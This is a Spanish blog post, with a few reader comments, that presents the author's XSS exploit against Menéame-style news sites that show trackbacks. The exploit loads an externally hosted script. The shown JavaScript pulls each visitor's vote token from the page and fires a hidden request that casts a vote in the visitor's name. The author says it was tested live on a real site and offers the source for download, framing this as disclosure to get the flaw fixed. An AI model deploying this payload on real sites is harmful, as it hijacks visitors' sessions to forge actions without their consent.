Finalmente, presento un pequeño exploit que hice para aprovechar la falla comentada en anteriores posts. Lo que hace el exploit es enviar un "ataque" XSS para que el script http://test.buayacorp.com/s.js cargue en la página afectada.
var doc = document.body.innerHTML;
var match = /menealo\((\d+),(\d+),\2,'([^']+)'\)/.exec(doc);
if (match != null && match.length == 4) {
var img = '<img src="/backend/menealo.php?user=' + match[1] + '&id=' + match[2] + '&md5=' + match[3] + '" style="display:none" />';
document.write(img);
}
}
Pueden ver el caso de prueba en floreame, a quienes de antemano pido disculpas por las molestias causadas y sugiero que actualizen a la última versión de el script para solucionar esto. Cada vez que entren en esta dirección, automáticamente estarán meneando el enlace enviado.
Código fuente: http.zip
Disclaimer: Este exploit ha sido publicado con el fin de que los pocos lectores de este sitio ayuden en cierta medida a que los responsables de los diferentes clones de Menéame que muestren el listado de trackbacks, puedan corregir la falla descrita en posts anteriores.
Sano???? ke hablas men.... me da curiosidad alguien ke habla de programacion... opte por wordpress ... si sabes tanto de programacion por ke no haces un blog tu mismo...
...
tons que haces comentando en un blog con wordpress, deberias estar comentando en slashdot o barrapunto, troll!!
Actulizado Floréame. Se agradece el consejo.
hola! lo que necesito es que son validacion de datos